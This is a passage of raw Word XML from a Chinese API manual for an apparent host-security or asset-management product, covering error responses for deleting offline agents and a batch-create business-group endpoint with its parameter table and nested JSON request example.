        <w:t xml:space="preserve">    "code": 100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "message": "password error",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "data": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444639A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>如果不是主</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>帐号</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>进行删除操作，则返回403，结果如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551DF516" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 403,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorMessage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "用户无权限",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "data": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795022C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>如果待批量删除超过7天离线主机不存在，则返回结果如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1253520A"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agent offline over 7 days",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "detail": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217EF505" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>如果批量删除指定agent时</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>参数为空，则返回结果如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8A7AD0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": ４</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>00</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorMessage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "参数</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>未填写",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "detail": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419647AB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>如果批量删除指定agent时有</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>不存在的情况，则返回结果如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D483740" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 400,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorMessage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "参数错误",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "detail": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167C5AB5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="157" w:name="_Toc115166153"/>
      <w:bookmarkStart w:id="158" w:name="批量创建业务组"/>
      <w:bookmarkEnd w:id="154"/>
      <w:bookmarkEnd w:id="156"/>
      <w:r>
        <w:t>批量创建业务组</w:t>
      </w:r>
      <w:bookmarkEnd w:id="157"/>
    </w:p>
    <w:p w14:paraId="3BB09E08" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AB6F4D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该功能API用于批量创建业务组。用户通过调用该接口，传入表示业务组层级结构的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>串，创建</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>串中的业务组。如果对于同一个用户，同一个平台（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/win）,同一级业务组已经存在，就会跳过</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>不</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>创建。否则创建为新业务组。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D9A102" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4002A0DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>为了满足功能，提供了四个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE25F02" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>批量创建</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>业务组接口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A639AF4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>批量创建windows业务组接口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3C6A92" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>查询所有</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>业务组。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD1140B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>查询所有win业务组。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FABBE4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>调用接口的方法、参数和返回信息具体如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B070820" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="159" w:name="_Toc115166154"/>
      <w:bookmarkStart w:id="160" w:name="批量创建linuxwindows业务组"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>批量创建</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux|windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>业务组</w:t>
      </w:r>
      <w:bookmarkEnd w:id="159"/>
    </w:p>
    <w:p w14:paraId="77CF757C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于批量创建</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>（或者windows）业务组；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDB0949" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A001D72" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/group/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>batch_create_group</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux|win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617675DB"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279"/>
        <w:gridCol w:w="1220"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="4349"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="48BEA82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8942B6D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0752B869" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B795662" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48F3B6F5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="418D304D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="554691A6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F4E7C34" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50FF83C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="756F1533" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>要创建的业务组名称（字符最大长度128）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="50D6EF67" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6082CDAA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1518EED8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="788F8026" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34342E09" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>要创建的业务组描述，可以为空，也可以</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>不</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>传入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="56184811" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60AB1DFB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sonGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FA9FEAD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="579BFA2E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15D98D8E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name业务组的</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>子业务</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>组，业务组最多四层</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C9198F3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>请求参数如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A5AE3E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "name":"第一级业务组a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "description":"第一级业务组a的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sonGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "name":"第二级业务组b1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "description":"第二级业务组b1的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sonGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "name":"第三级业务组c1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "description":"第三级业务组c1的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sonGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                "name":"第四级业务组d1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "description":"第四级业务组d1的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sonGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "name":"第四级业务组d2",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "description":"第四级业务组d2的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sonGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "name":"第三级业务组c2",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "description":"第三级业务组c2的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sonGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "name":"第四级业务组d3",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "description":"第四级业务组d3的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sonGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t xml:space="preserve">                                ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "name":"第四级业务组d4",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "description":"第四级业务组d4的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sonGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "name":"第二级业务组b2",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "description":"第二级业务组b2的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sonGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "name":"第三级业务组c3",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "description":"第三级业务组c3的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sonGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                "name":"第四级业务组d5",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "description":"第四级业务组d5的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sonGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071A660E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC9DF5C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/group/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>batch_create_group</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
